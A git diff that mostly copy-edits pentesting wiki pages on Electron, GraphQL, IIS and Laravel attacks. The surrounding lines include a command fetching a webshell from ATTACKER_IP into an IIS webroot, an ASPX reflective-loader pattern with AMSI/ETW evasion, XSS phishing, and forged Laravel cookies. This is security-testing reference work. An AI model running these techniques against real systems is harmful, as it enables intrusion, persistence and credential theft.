+++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
@@ -4,16 +4,16 @@
 
 ## Introduction
 
-Electron combines a local backend (with **NodeJS**) and a frontend (**Chromium**), although tt lacks some the security mechanisms of modern browsers.
+Electron combines a privileged **Node.js** main process with **Chromium** renderer processes. Electron is not a web browser: application code can deliberately expose capabilities such as filesystem and shell access, so loading untrusted content requires stricter boundary design than an ordinary website.<sup>[[31]](#references)</sup>
 
-Usually you might find the electron app code inside an `.asar` application, in order to obtain the code you need to extract it:
+Electron application code is commonly packaged in an `.asar` archive. Extract it before reviewing the source:
 
 ```bash
 npx asar extract app.asar destfolder #Extract everything
 npx asar extract-file app.asar main.js #Extract just a file
 ```
 
-In the source code of an Electron app, inside `packet.json`, you can find specified the `main.js` file where security configs ad set.
+The application's `package.json` identifies its main entry point. That file commonly creates renderer windows and sets their security-sensitive `webPreferences`.
 
 ```json
 {
@@ -21,7 +21,7 @@ In the source code of an Electron app, inside `packet.json`, you can find specif
   "main": "./app/index.js",
 ```
 
-Electron has 2 process types:
+Electron has two principal process types:
 
 - Main Process (has complete access to NodeJS)
 - Renderer Process (should have NodeJS restricted access for security reasons)
@@ -38,16 +38,16 @@ let win = new BrowserWindow()
 win.loadURL(`file://path/to/index.html`)
 ```
 
-Settings of the **renderer process** can be **configured** in the **main process** inside the main.js file. Some of the configurations will **prevent the Electron application to get RCE** or other vulnerabilities if the **settings are correctly configured**.
+The **main process** configures each renderer process, commonly when constructing a `BrowserWindow`. Secure settings reduce the chance that renderer compromise can become native code execution, but they do not make untrusted content intrinsically safe.<sup>[[31]](#references)[[32]](#references)</sup>
 
-The electron application **could access the device** via Node apis although it can be configure to prevent it:
+Review at least these renderer preferences:<sup>[[32]](#references)</sup>
 
-- **`nodeIntegration`** - is `off` by default. If on, allows to access node features from the renderer process.
-- **`contextIsolation`** - is `on` by default. If off, main and renderer processes aren't isolated.
-- **`preload`** - empty by default.
-- [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - is off by default. It will restrict the actions NodeJS can perform.
-- Node Integration in Workers
-- **`nodeIntegrationInSubframes`**- is `off` by default.
+- **`nodeIntegration`** is `false` by default. Enabling it gives renderer JavaScript access to Node.js APIs and also disables that renderer's sandbox.
+- **`contextIsolation`** is `true` by default. It separates the page's JavaScript context from the context used by preload scripts and Electron internals.
+- **`preload`** has no default path. A configured preload script runs before page scripts and can expose narrowly scoped APIs through `contextBridge`.
+- **`sandbox`** is `true` by default since Electron 20. It restricts renderer access to operating-system resources; setting `nodeIntegration: true` disables it.
+- **`nodeIntegrationInWorker`** is `false` by default and controls Node.js integration in Web Workers.
+- **`nodeIntegrationInSubFrames`** is `false` by default.
   - If **`nodeIntegration`** is **enabled**, this would allow the use of **Node.js APIs** in web pages that are **loaded in iframes** within an Electron application.
   - If **`nodeIntegration`** is **disabled**, then preloads will load in the iframe
 
@@ -115,7 +115,7 @@ Modify the start-main configuration and add the use of a proxy such as:
 
 ## Electron Local Code Injection
 
-If you can execute locally an Electron App it's possible that you could make it execute arbitrary javascript code. Check how in:
+If you can modify or instrument a locally installed Electron application, you may be able to make it execute arbitrary JavaScript. See:
 
 
 {{#ref}}
@@ -303,23 +303,23 @@ Further, another method for **reading an internal file** is shared, highlighting
 
 ## **RCE: XSS + Old Chromium**
 
-If the **chromium** used by the application is **old** and there are **known** **vulnerabilities** on it, it might be possible to to **exploit it and obtain RCE through a XSS**.<sup>[[30]](#references)</sup>\
+If the **Chromium** version bundled with the application is old and has known vulnerabilities, it may be possible to exploit it and turn XSS into RCE.<sup>[[30]](#references)</sup>\
 You can see an example in this **writeup**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)<sup>[[22]](#references)</sup>
 
 ## **XSS Phishing via Internal URL regex bypass**
 
-Supposing you found a XSS but you **cannot trigger RCE or steal internal files** you could try to use it to **steal credentials via phishing**.<sup>[[11]](#references)</sup>
+If you find XSS but **cannot trigger RCE or steal internal files**, you could still try to **steal credentials via phishing**.<sup>[[11]](#references)</sup>
 
-First of all you need to know what happen when you try to open a new URL, checking the JS code in the front-end:
+First, inspect the frontend code to determine what happens when a new URL is opened:
 
 ```javascript
 webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
 webContents.on("will-navigate", function (event, url) {}                    // opens the custom openInternally function (it is declared below)
 ```
 
-The call to **`openInternally`** will decide if the **link** will be **opened** in the **desktop window** as it's a link belonging to the platform, **or** if will be opened in the **browser as a 3rd party resource**.
+The call to **`openInternally`** decides whether a platform link opens in the **desktop window** or a third-party resource opens in the system browser.
 
-In the case the **regex** used by the function is **vulnerable to bypasses** (for example by **not escaping the dots of subdomains**) an attacker could abuse the XSS to **open a new window which** will be located in the attackers infrastructure **asking for credentials** to the user:
+If the function's URL allowlist regex can be bypassed—for example, because dots in a hostname were not escaped—an attacker could abuse XSS to open a convincing credential prompt on attacker-controlled infrastructure:
 
 ```html
 <script>
@@ -329,7 +329,7 @@ In the case the **regex** used by the function is **vulnerable to bypasses** (fo
 
 ## `file://` Protocol
 
-As mentioned in [the docs](https://www.electronjs.org/docs/latest/tutorial/security#18-avoid-usage-of-the-file-protocol-and-prefer-usage-of-custom-protocols) pages running on **`file://`** have unilateral access to every file on your machine meaning that **XSS issues can be used to load arbitrary files** from the users machine. Using a **custom protocol** prevents issues like this as you can limit the protocol to only serving a specific set of files.
+As mentioned in [the Electron security guide](https://www.electronjs.org/docs/latest/tutorial/security#18-avoid-usage-of-the-file-protocol-and-prefer-usage-of-custom-protocols), pages running on **`file://`** receive broad file access. Consequently, **XSS may be usable to load arbitrary files** from the user's machine. A correctly designed **custom protocol** can restrict access to a specific set of files.<sup>[[31]](#references)</sup>
 
 ## Remote module
 
@@ -341,9 +341,9 @@ The Electron Remote module allows **renderer processes to access main process AP
 > [!WARNING]
 > Many apps that still use the remote module do it in a way that **require NodeIntegration to be enabled** in the renderer process, which is a **huge security risk**.
 
-Since Electron 14 the `remote` module of Electron might be enabled in several steops cause due to security and performance reasons it's **recommended to not use it**.
+Electron's built-in `remote` module was deprecated and then removed; applications that still need its model may use the separate `@electron/remote` package. Because of the security and performance implications, avoid exposing remote-style capabilities to untrusted renderers.
 
-To enable it, it'd first needed to **enable it in the main process**:
+With `@electron/remote`, it must first be **initialized in the main process**:
 
 ```javascript
 const remoteMain = require('@electron/remote/main')
@@ -356,7 +356,7 @@ function createMainWindow() {
   remoteMain.enable(mainWindow.webContents)
 ```
 
-Then, the renderer process can import objects from the module it like:
+The renderer process can then import objects from the module:
 
 ```javascript
 import { dialog, getCurrentWindow } from '@electron/remote'
@@ -425,7 +425,7 @@ console.log('Recent Places:', recentPlaces);
 
 ## Shell.showItemInFolder
 
-This function whows the given file in a file manager, which **could automatically execute the file**.
+This function shows the given file in a file manager. On affected platforms and versions, that interaction **could automatically execute the file**.
 
 For more information check [https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html](https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html)<sup>[[16]](#references)</sup>
 
@@ -470,6 +470,8 @@ Related reading on postMessage trust issues:
 ## VS Code / github.dev: synthetic webview shortcuts + declarative extension command bridges
 
 A different VS Code webview escape class appeared in June 2026: **untrusted JavaScript inside a notebook/preview webview could synthesize privileged global shortcuts** because the webview preload forwarded `keydown` data to the host workbench and the host handled it as real user input.<sup>[[24]](#references)</sup>
+
+This is part of a broader history of IDE trust-boundary attacks in which project-controlled content reaches privileged editor features.<sup>[[29]](#references)</sup>
 
 ### Boundary failure
 
@@ -558,24 +560,26 @@ Practical implications:
 
 ## **Tools**
 
+The curated **awesome-electronjs-hacking** collection provides additional research, tooling, and vulnerable-application resources.<sup>[[15]](#references)</sup>
+
 - [**Electronegativity**](https://github.com/doyensec/electronegativity) is a tool to identify misconfigurations and security anti-patterns in Electron-based applications.
 - [**Electrolint**](https://github.com/ksdmitrieva/electrolint) is an open source VS Code plugin for Electron applications that uses Electronegativity.
-- [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) to check for vulnerable third party libraries
-- [**Electro.ng**](https://electro.ng/): You need to buy it
+- [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) checks for vulnerable third-party libraries.
+- [**Electro.ng**](https://electro.ng/) is a commercial Electron security-analysis tool.
 
 ## Labs
 
 In [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo&t=22s) you can find a lab to exploit vulnerable Electron apps.<sup>[[14]](#references)</sup>
 
-Some commands that will help you will the lab:
+These commands help you work through the lab:
 
 ```bash
-# Download apps from these URls
+# Download apps from these URLs
 # Vuln to nodeIntegration
 https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable1.zip
 # Vuln to contextIsolation via preload script
 https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable2.zip
-# Vuln to IPC Rce
+# Vulnerable to IPC-based RCE
 https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable3.zip
 
 # Get inside the electron app and check for vulnerabilities
@@ -730,5 +734,7 @@ Detection and mitigations
 - [28] [VS Code 1.89 / local workspace extensions](https://code.visualstudio.com/updates/v1_89#_local-workspace-extensions)
 - [29] [APPSEC Cali 2018 - MarkDoom: How I Hacked Every Major IDE in 2 Weeks](https://www.youtube.com/watch?v=a-YnG3Mx-Tg)
 - [30] [ElectroVolt: Pwning Popular Desktop Apps While Uncovering New Attack Surface on Electron](https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81)
+- [31] [Electron Security](https://www.electronjs.org/docs/latest/tutorial/security)
+- [32] [Electron BrowserWindow webPreferences](https://www.electronjs.org/docs/latest/api/browser-window#new-browserwindowoptions)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/graphql.md
+++ b/src/network-services-pentesting/pentesting-web/graphql.md
@@ -8,11 +8,11 @@ GraphQL is **highlighted** as an **efficient alternative** to REST API, offering
 
 ## GraphQL and Security
 
-With the advent of new technologies, including GraphQL, new security vulnerabilities also emerge. A key point to note is that **GraphQL does not include authentication mechanisms by default**. It's the responsibility of developers to implement such security measures. Without proper authentication, GraphQL endpoints may expose sensitive information to unauthenticated users, posing a significant security risk.<sup>[[1]](#references)</sup>
+GraphQL does not provide application authentication or authorization by itself; developers must enforce those controls in the surrounding application and in resolver logic. Without them, endpoints may expose sensitive information or operations to unauthenticated or unauthorized users.<sup>[[1]](#references)[[6]](#references)</sup>
 
 ### Directory Brute Force Attacks and GraphQL
 
-To identify exposed GraphQL instances, the inclusion of specific paths in directory brute force attacks is recommended. These paths are:<sup>[[5]](#references)</sup>
+When looking for exposed GraphQL endpoints, include common paths in content-discovery scans. Practical GraphQL testing guides use paths and probes such as these:<sup>[[4]](#references)[[5]](#references)</sup>
 
 - `/graphql`
 - `/graphiql`
@@ -27,7 +27,7 @@ Identifying open GraphQL instances allows for the examination of supported queri
 
 ### Fingerprint
 
-The tool [**graphw00f**](https://github.com/dolevf/graphw00f) is capable to detect which GraphQL engine is used in a server and then prints some helpful information for the security auditor.
+The tool [**graphw00f**](https://github.com/dolevf/graphw00f) can identify the GraphQL engine used by a server and print information useful to a security auditor.
 
 #### Universal queries <a href="#universal-queries" id="universal-queries"></a>
 
@@ -39,7 +39,7 @@ query{__typename}
 
 ### Basic Enumeration
 
-Graphql usually supports **GET**, **POST** (x-www-form-urlencoded) and **POST**(json). Although for security it's recommended to only allow json to prevent CSRF attacks.
+GraphQL-over-HTTP servers must support `POST` and may support `GET`; mutations must not be executed through `GET`. Compliant servers support JSON request bodies, while some implementations additionally accept form or other simple content types. For state-changing operations, require `POST` with an appropriate JSON content type and deploy normal CSRF protections; rejecting simple content types can remove one common CSRF path but is not a complete CSRF defense.<sup>[[21]](#references)</sup>
 
 #### Introspection
 
@@ -57,13 +57,13 @@ With this query you will find the name of all the types being used:
 query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}
 ```
 
-With this query you can extract all the types, it's fields, and it's arguments (and the type of the args). This will be very useful to know how to query the database.
+With this query you can extract all the types, their fields, and their arguments (including argument types). This is useful for learning how to query the API.
 
-![Basic Enumeration - Introspection: With this query you can extract all the types, it's fields, and it's arguments (and the type of the args). This will be very useful to know how to...](<../../images/image (950).png>)
+![Basic Enumeration - Introspection: query output showing types, fields, arguments, and argument types](<../../images/image (950).png>)
 
 **Errors**
 
-It's interesting to know if the **errors** are going to be **shown** as they will contribute with useful **information.**
+Determine whether detailed **errors** are returned, because they can disclose useful schema and implementation information.
 
 ```
 ?query={__schema}
@@ -174,7 +174,7 @@ Inline introspection query:
 /?query=fragment%20FullType%20on%20Type%20{+%20%20kind+%20%20name+%20%20description+%20%20fields%20{+%20%20%20%20name+%20%20%20%20description+%20%20%20%20args%20{+%20%20%20%20%20%20...InputValue+%20%20%20%20}+%20%20%20%20type%20{+%20%20%20%20%20%20...TypeRef+%20%20%20%20}+%20%20}+%20%20inputFields%20{+%20%20%20%20...InputValue+%20%20}+%20%20interfaces%20{+%20%20%20%20...TypeRef+%20%20}+%20%20enumValues%20{+%20%20%20%20name+%20%20%20%20description+%20%20}+%20%20possibleTypes%20{+%20%20%20%20...TypeRef+%20%20}+}++fragment%20InputValue%20on%20InputValue%20{+%20%20name+%20%20description+%20%20type%20{+%20%20%20%20...TypeRef+%20%20}+%20%20defaultValue+}++fragment%20TypeRef%20on%20Type%20{+%20%20kind+%20%20name+%20%20ofType%20{+%20%20%20%20kind+%20%20%20%20name+%20%20%20%20ofType%20{+%20%20%20%20%20%20kind+%20%20%20%20%20%20name+%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}++query%20IntrospectionQuery%20{+%20%20schema%20{+%20%20%20%20queryType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20mutationType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20types%20{+%20%20%20%20%20%20...FullType+%20%20%20%20}+%20%20%20%20directives%20{+%20%20%20%20%20%20name+%20%20%20%20%20%20description+%20%20%20%20%20%20locations+%20%20%20%20%20%20args%20{+%20%20%20%20%20%20%20%20...InputValue+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}
 ```
 
-The last code line is a graphql query that will dump all the meta-information from the graphql (objects names, parameters, types...)
+The preceding request is a GraphQL query that dumps schema metadata such as object names, parameters, and types.
 
 ![Basic Enumeration - Introspection: The last code line is a graphql query that will dump all the meta-information from the graphql (objects names, parameters, types...)](<../../images/image (363).png>)
 
@@ -192,17 +192,17 @@ Note that the type of the query "_flags_" is "_Flags_", and this object is defin
 
 ![Introspection - Querying: Note that the type of the query " flags " is " Flags ", and this object is defined as below](<../../images/Screenshot from 2021-03-13 18-22-57 (1).png>)
 
-You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
+The `_Flags_` objects contain **name** and **value** fields, so you can request all flag names and values with:
 
 ```javascript
 query={flags{name, value}}
 ```
 
-Note that in case the **object to query** is a **primitive** **type** like **string** like in the following example
+If the **object to query** is a primitive type such as a string, as in the following example:
 
 ![Introspection - Querying: Note that in case the object to query is a primitive type like string like in the following example](<../../images/image (958).png>)
 
-You can just query is with:
+You can query it directly with:
 
 ```javascript
 query = { hiddenFlags }
@@ -218,11 +218,11 @@ However, in this example if you try to do so you get this **error**:
 ![Introspection - Querying: However, in this example if you try to do so you get this error](<../../images/image (1042).png>)
 
 Looks like somehow it will search using the "_**uid**_" argument of type _**Int**_.\
-Anyway, we already knew that, in the [Basic Enumeration](graphql.md#basic-enumeration) section a query was purposed that was showing us all the needed information: `query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
+The [Basic Enumeration](graphql.md#basic-enumeration) section already proposed a query that returns the needed information: `query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
 
 If you read the image provided when I run that query you will see that "_**user**_" had the **arg** "_**uid**_" of type _Int_.
 
-So, performing some light _**uid**_ bruteforce I found that in _**uid**=**1**_ a username and a password was retrieved:\
+In this example, light _**uid**_ brute force reveals that _**uid**=**1**_ returns a username and password:\
 `query={user(uid:1){user,password}}`
 
 ![Introspection - Querying: query={user(uid:1){user,password}}](<../../images/image (90).png>)
@@ -239,7 +239,7 @@ If you can search by a string type, like: `query={theusers(description: ""){user
 
 ### Searching
 
-In this setup, a **database** contains **persons** and **movies**. **Persons** are identified by their **email** and **name**; **movies** by their **name** and **rating**. **Persons** can be friends with each other and also have movies, indicating relationships within the database.
+The examples in the searching and mutation sections use a **database** containing **persons** and **movies**. **Persons** are identified by their **email** and **name**; **movies** by their **name** and **rating**. **Persons** can be friends with each other and can have movies, representing relationships within the database.
 
 You can **search** persons **by** the **name** and get their emails:
 
@@ -313,9 +313,7 @@ In the **introspection** you can find the **declared** **mutations**. In the fol
 
 ![Searching - Mutations: In the introspection you can find the declared mutations . In the following image the " MutationType " is called " Mutation " and the " Mutation " object contains...](<../../images/Screenshot from 2021-03-13 18-26-27 (1).png>)
 
-In this setup, a **database** contains **persons** and **movies**. **Persons** are identified by their **email** and **name**; **movies** by their **name** and **rating**. **Persons** can be friends with each other and also have movies, indicating relationships within the database.
-
-A mutation to **create new** movies inside the database can be like the following one (in this example the mutation is called `addMovie`):
+Using the same persons-and-movies schema, a mutation to **create a new movie** in the database can look like the following example (where the mutation is called `addMovie`):
 
 ```javascript
 mutation {
@@ -498,9 +496,9 @@ query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A
 
 Therefore, as CSRF requests like the previous ones are sent **without preflight requests**, it's possible to **perform** **changes** in the GraphQL abusing a CSRF.
 
-However, note that the new default cookie value of the `samesite` flag of Chrome is `Lax`. This means that the cookie will only be sent from a third party web in GET requests.
+Cookies without an explicit `SameSite` attribute are generally treated as `SameSite=Lax`. Such cookies can accompany a cross-site request only when it is a top-level navigation using a safe method (most notably `GET`), so they are not sent with ordinary cross-site subresource requests.<sup>[[22]](#references)</sup>
 
-Note that it's usually possible to send the **query** **request** also as a **GET** **request and the CSRF token might not being validated in a GET request.**
+Some GraphQL servers also accept a **query request as a GET request**, and an implementation might fail to validate its CSRF token on that path.
 
 Also, abusing a [**XS-Search**](../../pentesting-web/xs-search/index.html) **attack** might be possible to exfiltrate content from the GraphQL endpoint abusing the credentials of the user.
 
@@ -819,5 +817,7 @@ https://graphql-dashboard.herokuapp.com/
 - [18] [GraphQL Query Authentication Bypass Vuln](https://s1n1st3r.gitbook.io/theb10g/graphql-query-authentication-bypass-vuln)
 - [19] [HackerOne Report #792927 - sensitive account details leak via GraphQL query variables](https://hackerone.com/reports/792927)
 - [20] [graphql.org - GraphQL: A query language for APIs](https://graphql.org/learn/introspection)
+- [21] [GraphQL over HTTP specification](https://graphql.github.io/graphql-over-http/draft/)
+- [22] [SameSite cookies explained](https://web.dev/articles/samesite-cookies-explained)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
+++ b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
@@ -23,9 +23,9 @@ iwr http://ATTACKER_IP/shell.aspx -OutFile C:\inetpub\wwwroot\shell.aspx
 - Request `/shell.aspx` and run commands; identity typically shows `iis apppool\defaultapppool`.
 - Combine with Potato-family LPE (e.g., GodPotato/SigmaPotato) when the AppPool token has SeImpersonatePrivilege to pivot to SYSTEM.
 
-## Internal IP Address disclosure
+## Internal IP address disclosure
 
-On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address:
+When an IIS deployment returns a redirect, try removing the `Host` header and sending HTTP/1.0. A misconfigured response may place an internal IP address in the `Location` header:
 
 ```
 nc -v domain.com 80
@@ -47,11 +47,11 @@ X-FEServer: NHEXCHANGE2016
 
 ## Execute .config files
 
-You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: [Download example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
+If an application lets you upload a `.config` file into a served directory, an IIS `web.config` may be usable for code execution. One technique appends the payload inside an HTML comment: [download an example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config).
 
 More information and techniques to exploit this vulnerability [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)<sup>[[2]](#references)</sup>
 
-## IIS Discovery Bruteforce
+## IIS discovery and brute force
 
 ### Passive discovery and active fingerprinting
 
@@ -92,7 +92,7 @@ It was created merging the contents of the following lists:
 [https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
 [https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
 
-Use it without adding any extension, the files that need it have it already.
+Use it without adding extensions; entries that need an extension already include one.
 
 ### IIS-specific files and extensions worth fuzzing
 
@@ -138,8 +138,8 @@ tr '[:upper:]' '[:lower:]' | sort -u
 Check the full writeup in: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)<sup>[[4]](#references)</sup>
 
 > [!TIP]
-> As summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where are executables located** and download them.\
-> From the **downloaded Dlls** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.\
+> In summary, an application may contain several `web.config` files with references to **assembly identities** and **namespaces**. This information can reveal where binaries are located so you can download them.\
+> Decompiling downloaded DLLs can expose additional namespaces. Probe the corresponding directories for more `web.config` files, namespaces, and assembly identities.\
 > Also, the files **connectionstrings.config** and **global.asax** may contain interesting information.
 
 In **.Net MVC applications**, the **web.config** file plays a crucial role by specifying each binary file the application relies on through **"assemblyIdentity"** XML tags.
@@ -288,8 +288,8 @@ If you see an error like the following one:
 
 ![Common files - HTTPAPI 2.0 404 Error: If you see an error like the following one](<../../images/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
 
-It means that the server **didn't receive the correct domain name** inside the Host header.\
-In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
+This usually means that the server **did not receive the expected domain name** in the `Host` header.\
+Inspect the served **TLS certificate** for domain or subdomain names. If it does not identify the site, you may need to **brute-force virtual hosts** until you find the correct one.
 
 ```bash
 ffuf -u https://TARGET_IP/ -H 'Host: FUZZ.target.com' -w vhosts.txt -fs 0
@@ -307,9 +307,10 @@ A front proxy may evaluate the request as `/anything/`, while IIS decodes `%2f` 
 
 ## Decrypt encrypted configuration and ASP.NET Core Data Protection key rings
 
-Two common patterns to protect secrets on IIS-hosted .NET apps are:
-- ASP.NET Protected Configuration (RsaProtectedConfigurationProvider) for web.config sections like <connectionStrings>.
-- ASP.NET Core Data Protection key ring (persisted locally) used to protect application secrets and cookies.
+Two common patterns for protecting secrets in IIS-hosted .NET applications are:
+
+- ASP.NET Protected Configuration (`RsaProtectedConfigurationProvider`) for `web.config` sections such as `<connectionStrings>`.
+- ASP.NET Core Data Protection key rings persisted locally and used to protect application secrets and cookies.
 
 If you have filesystem or interactive access on the web server, co-located keys often allow decryption.
 
@@ -374,7 +375,7 @@ For broader post-exploitation loot after OS execution, check [Windows Local Priv
 
 The Phantom Taurus/NET-STAR toolkit shows a mature pattern for fileless IIS persistence and post‑exploitation entirely inside w3wp.exe. The core ideas are broadly reusable for custom tradecraft and for detection/hunting.<sup>[[7]](#references)</sup>
 
-Key building blocks
+Key building blocks:
 - ASPX bootstrapper hosting an embedded payload: a single .aspx page (e.g., OutlookEN.aspx) carries a Base64‑encoded, optionally Gzip‑compressed .NET DLL. Upon a trigger request it decodes, decompresses and reflectively loads it into the current AppDomain and invokes the main entry point (e.g., ServerRun.Run()).
 - Cookie‑scoped, encrypted C2 with multi‑stage packing: tasks/results are wrapped with Gzip → AES‑ECB/PKCS7 → Base64 and moved via seemingly legitimate cookie‑heavy requests; operators used stable delimiters (e.g., "STAR") for chunking.
 - Reflective .NET execution: accept arbitrary managed assemblies as Base64, load via Assembly.Load(byte[]) and pass operator args for rapid module swaps without touching disk.
@@ -382,7 +383,7 @@ Key building blocks
 - Timestomping/metadata forgery: expose a changeLastModified action and timestomp on deployment (including future compilation timestamps) to hinder DFIR.
 - Optional AMSI/ETW pre‑disable for loaders: a second‑stage loader can disable AMSI and ETW before calling Assembly.Load to reduce inspection of in‑memory payloads.<sup>[[17]](#references)</sup>
 
-Minimal ASPX loader pattern
+Minimal ASPX loader pattern:
 ```aspx
 <%@ Page Language="C#" %>
 <%@ Import Namespace="System" %>
@@ -558,7 +559,7 @@ You can try to **mix** this **vulnerability** and the last one to find new **fol
 
 ## ASP.NET Trace.AXD enabled debugging
 
-ASP.NET include a debugging mode and its file is called `trace.axd`.
+ASP.NET includes request tracing, commonly exposed through `trace.axd` when enabled.<sup>[[11]](#references)</sup>
 
 It keeps a very detailed log of all requests made to an application over a period of time.
 
@@ -627,7 +628,7 @@ For the **legacy vs .NET 4.5+** details, `__VIEWSTATEGENERATOR`, `ViewStateUserK
 
 ## IIS Authentication Bypass with cached passwords (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
 
-[Full report here](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): A bug in the code **didn't properly check for the password given by the user**, so an attacker whose **password hash hits a key** that is already in the **cache** will be able to login as that user .<sup>[[14]](#references)</sup>
+[The full report](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html) explains that the affected code **did not properly validate the submitted password**. An attacker whose **password hash collides with a key already in the cache** could therefore log in as that user.<sup>[[14]](#references)</sup>
 
 ```python
 # script for sanity check

--- a/src/network-services-pentesting/pentesting-web/laravel.md
+++ b/src/network-services-pentesting/pentesting-web/laravel.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-### Laravel SQLInjection
+## Laravel SQL injection
 
 Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)<sup>[[13]](#references)</sup>
 
@@ -38,7 +38,7 @@ Inject the produced string into any vulnerable `decrypt()` sink (route param, co
 ---
 
 ## laravel-crypto-killer 🧨
-[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automates the whole process and adds a convenient **bruteforce** mode:<sup>[[3]](#references)</sup>
+[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automates the process and adds a convenient **brute-force** mode:<sup>[[3]](#references)</sup>
 
 ```bash
 # Encrypt a phpggc chain with a known APP_KEY
@@ -91,7 +91,7 @@ curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https:
 
 ## Mass APP_KEY discovery via cookie brute-force
 
-Because every fresh Laravel response sets at least 1 encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline.<sup>[[14]](#references)</sup>
+Because every fresh Laravel response sets at least one encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline.<sup>[[1]](#references)</sup>
 
 Key findings of the research published by Synacktiv (2024-2025):<sup>[[1]](#references)[[2]](#references)</sup>
 * Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k)
@@ -99,7 +99,7 @@ Key findings of the research published by Synacktiv (2024-2025):<sup>[[1]](#refe
 * >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data.
 * Huge key reuse – the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).
 
-The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.<sup>[[1]](#references)[[2]](#references)</sup>
